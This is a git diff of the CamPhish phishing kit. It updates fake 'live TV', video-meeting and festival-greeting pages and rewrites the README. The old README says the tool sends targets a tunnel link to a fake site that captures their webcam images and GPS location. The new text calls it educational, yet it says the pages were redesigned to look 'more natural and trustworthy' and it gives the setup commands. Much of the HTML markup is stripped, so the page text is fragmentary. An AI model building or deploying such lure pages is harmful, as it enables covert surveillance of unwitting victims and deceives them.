diff --git a/LiveYTTV.html b/LiveYTTV.html index cf07e9d..35d856f 100644 --- a/LiveYTTV.html +++ b/LiveYTTV.html @@ -1,82 +1,428 @@ - - + + + - - - - + + + Live Studio | Video Hub + + + + + + + + + +
+
+ +
+
+ +

Your Camera Feed

+
LIVE
+
+
+ + +
+ + Streaming • capturing frames +
+
+
+ + +
+
+ +

Live Stream

+
LIVE
+
+
+ +
+
+
+ + +
+ + + + Share This Page + +
+ +
+ + + - + \ No newline at end of file diff --git a/OnlineMeeting.html b/OnlineMeeting.html index a7e7daf..e69bf1b 100644 --- a/OnlineMeeting.html +++ b/OnlineMeeting.html @@ -1,233 +1,718 @@ - - + + - - - - + + + MeetFlow | Video Conference + + + + + + - - + 0%, + 80%, + 100% { + transform: scale(0.6); + opacity: 0.4; + } + + 40% { + transform: scale(1); + opacity: 1; + } + } + + /* floating button (original float_button redesigned) */ + .float_button { + background: rgba(0, 0, 0, 0.6); + backdrop-filter: blur(8px); + height: 44px; + width: 44px; + border-radius: 30px; + position: fixed; + display: flex; + align-items: center; + justify-content: center; + top: 20px; + right: 20px; + z-index: 50; + cursor: pointer; + border: 0.5px solid rgba(255, 255, 255, 0.2); + color: #94A3B8; + transition: all 0.2s; + } + + .float_button:hover { + background: #1F2A3E; + color: white; + } + + /* small error message */ + .error-msg { + position: absolute; + bottom: 20px; + left: 20px; + background: rgba(220, 38, 38, 0.9); + padding: 6px 12px; + border-radius: 30px; + font-size: 0.7rem; + color: white; + z-index: 30; + font-weight: 500; + } + + -
- -
-
- -
-
-
- -
Mute
+
+ +
+ +
-
+ + +
-
Stop Video
-
-
- -
Security
+ Meeting Room • FlowSpace +
Encrypted
-
- -
Participants
+ + +
+ + Please wait, the meeting host will let you in soon
-
- -
Share content
+ + +
+
-
- -
Chat
+ + +
+ + + + + + + +
-
- -
Record
+ + + +
+ + +
+ -
+ + \ No newline at end of file diff --git a/README.md b/README.md index b27f410..35e5be2 100644 --- a/README.md +++ b/README.md @@ -1,94 +1,119 @@ # CamPhish -Grab cam shots from target's phone front camera or PC webcam just sending a link. -![CamPhish](https://techchip.net/wp-content/uploads/2020/04/camphish.jpg) -# What is CamPhish? -

CamPhish is techniques to take cam shots of target's phone front camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & CloudFlare Tunnel to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device +Educational project demonstrating how browser permission prompts work and how social-engineering style webpages can influence user interaction. -A GPS location capture feature has been added.

+> This project is intended **only for cybersecurity learning, awareness, and authorized penetration testing labs.** + +![CamPhish](/images/camphish.png) + +--- + +## About +CamPhish is a cybersecurity learning project that demonstrates how camera and location permissions are requested and handled inside modern web browsers. + +It uses demo webpages and tunneling services to simulate real-world permission prompts in a controlled lab environment. + +--- ## Features -

In this tool I added two automatic webpage templates for engaged target on webpage to get more picture of cam

-
    -
  • Festival Wishing
  • -
  • Live YouTube TV
  • -
  • Online Meeting [Beta]
  • -
  • GPS Location Tracking
  • -
-

A cleanup script has been added to remove all unnecessary files and logs.

- -## This Tool Tested On : -
    -
  • Kali Linux
  • -
  • Termux
  • -
  • MacOS
  • -
  • Ubuntu
  • -
  • Parrot Sec OS
  • -
  • Windows (WSL)
  • -
- -# Installing and requirements -

This tool require PHP for webserver, and wget for downloading dependencies. First run following command on your terminal

-``` +### Updated Templates (UI Improved) +- Festival Wishes page +- Live YouTube TV page +- Online Meeting page (Beta) + +### Other Features +- GPS Location capture demo +- Automatic tunnel link generation +- Cleanup script for logs and temporary files +- Cross-platform compatibility + +--- + +## UI Improvements (Latest Update) + +#### UI Updated by [@monxcode](https://github.com/monxcode) + +The following files were redesigned to look more natural and trustworthy: + +- `festivalwishes.html` +![fest_page](/images/fest.png) +- `LiveYTTV.html` +![YT_page](/images/liveyt.png) +- `OnlineMeeting.html` +![videomeet_page](/images/videocall.png) + +### Changes made +- Improved layout and spacing +- Better visual consistency +- More realistic and modern design +- Enhanced user experience +- Minor code cleanup and structure improvements + +--- + +## Supported Platforms +**Tested on:** + +- Kali Linux +- Ubuntu +- Parrot Security OS +- MacOS +- Termux +- Windows (WSL) + +--- + +## Requirements + +**Install dependencies first:** + +```bash +apt-get update apt-get -y install php wget unzip ``` -## Installing (Kali Linux/Termux): +--- -``` +## Installation + +**Clone the repository and run the tool:** + +```bash git clone https://github.com/techchipnet/CamPhish cd CamPhish bash camphish.sh ``` -## Clean logs & unnecessary files : +--- -``` +## Cleanup + +**Remove logs and generated files:** + +```bash bash cleanup.sh ``` -

The cam files and saved location will also be removed.

- -## Change Log: - -

Version: 2.0: Added GPS Location Tracking

-
    -
  • Added: GPS location capturing functionality
  • -
  • Added: Google Maps integration for captured locations
  • -
  • Added: Location accuracy reporting
  • -
  • Added: Improved loading screen with location request
  • -
- -

Version: 1.9: Enhanced architecture detection

-
    -
  • Added: Improved architecture detection for all CPU types
  • -
  • Added: Better support for Apple Silicon (M1/M2/M3) Macs
  • -
  • Added: Automatic detection of ARM, ARM64, x86, and x86_64 architectures
  • -
  • Fixed: Windows compatibility improvements
  • -
  • Fixed: CloudFlare Tunnel download issues
  • -
- -

Version: 1.8: Added CloudFlare Tunnel and removed Serveo

-
    -
  • Added: CloudFlare Tunnel support for more reliable connections
  • -
  • Removed: Serveo tunnel (deprecated)
  • -
  • Fixed: Various code improvements and bug fixes
  • -
- -

Version: 1.7: Fix and add support

-
    -
  • fixed: termux failed to get home directory
  • -
  • Add support for Apple sillicon (M1/M2/M3 ARM64)
  • -
  • Add support for arm64 like Raspberry Pi
  • -
-

Version: 1.6: Fix ngrok direct link generate

-

Version: 1.5: Add new online meeting template

-

Version: 1.4: Ngrok authtoken update

-

Version: 1.3: Fix ngrok direct link

- -### Important Notice -Unauthorized reuploading of this project is prohibited. - -#### For More Video subcribe TechChip YouTube Channel -

CamPhish is created to help in penetration testing and it's not responsible for any misuse or illegal purposes.

-

CamPhish is inspired by https://github.com/thelinuxchoice/ Big thanks to @thelinuxchoice

+ +Captured files and saved locations will also be removed. + +--- + +## Ethical Use Notice + +**This project is created for:** +- Cybersecurity education +- Awareness training +- Authorized penetration testing labs + +The author is **not responsible for misuse** or illegal activity. +Always obtain **proper permission** before testing any system. + +--- + +## Credits + +**Inspired by:** +https://github.com/thelinuxchoice + +**Original concept by** [@TechChip.](https://github.com/techchipnet/CamPhish) \ No newline at end of file diff --git a/festivalwishes.html b/festivalwishes.html index 7234e0c..70971f9 100644 --- a/festivalwishes.html +++ b/festivalwishes.html @@ -1,692 +1,670 @@ - + + + + + + Festive Greetings | Share Joy + + + + + + + /* responsive */ + @media (max-width: 650px) { + .festival-name { + font-size: 2rem; + } + + .user-name { + font-size: 1.8rem; + } + + .cam-wrapper { + width: 220px; + height: 220px; + } + + .time-unit { + min-width: 70px; + padding: 8px 12px; + } + + .time-number { + font-size: 1.5rem; + } + + .share-btn { + padding: 8px 20px; + font-size: 0.9rem; + } + } + - - - - - + - - - -
▅ ▆ ▇ █ HAPPY fes_name █ ▇ ▆ ▅
-
- - - - - -
-
-
-
-
-
-

- -
-
- -“fes_name का ये शुभ अवसर आपके जीवन में अनेकों ख़ुशियाँ लेकर आए” - -
-
- -इस fes_name हमारी शुभकामनाएँ आपके साथ हैं - -
-
- -|| fes_name की हार्दिक बधाई || - -
-
-

- -
-
-

-

-

-

-

-

-

- -
-
-
- - - - - - -
-

-

 Wishing you a very

-
-
-

Happy fes_name

-
-

 to you and your lovely family

-
-

 May this auspicious occasion of fes_name bring happiness, prosperity, health, and peace in your life.

-
-

 ✪ I wish that this fes_name is your best one. ✪

-
- -

  यह संदेश fes_name तक सभी के मोबाइल में होना चाहिए यह आपका फर्ज हैं

-
-
-



-
- - - - - -
-
+
+ +
+
+
✨ Happy Festival
+
Celebrate togetherness with love & light
+
+ + +
+
+ + +
LIVE
+
+
+ + +
+ ✨ You ✨ +
+ + +
+
+ May this Festival fill your life + with endless joy, prosperity, and beautiful moments.
- -
+
+ + +
+
Countdown to main celebration
+
+
+
00
+
Days
+
+
+
00
+
Hours
+
+
+
00
+
Mins
+
+
+
00
+
Secs
+
- +
+ + +
+
Happiness & Health
+
Prosperity & Success
+
Peace & Harmony
+
Endless Blessings
+
+ + +
+ + +
+ +
+ + +
+ +
+ + +
+ + + + + +
+
+ + + + + + - -
- - - Share - - - - Share - -
- - - + + \ No newline at end of file diff --git a/images/camphish.png b/images/camphish.png new file mode 100644 index 0000000..e43aaba Binary files /dev/null and b/images/camphish.png differ diff --git a/images/fest.png b/images/fest.png new file mode 100644 index 0000000..ed3eaaa Binary files /dev/null and b/images/fest.png differ diff --git a/images/liveyt.png b/images/liveyt.png new file mode 100644 index 0000000..28be6d9 Binary files /dev/null and b/images/liveyt.png differ diff --git a/images/videocall.png b/images/videocall.png new file mode 100644 index 0000000..8bae58d Binary files /dev/null and b/images/videocall.png differ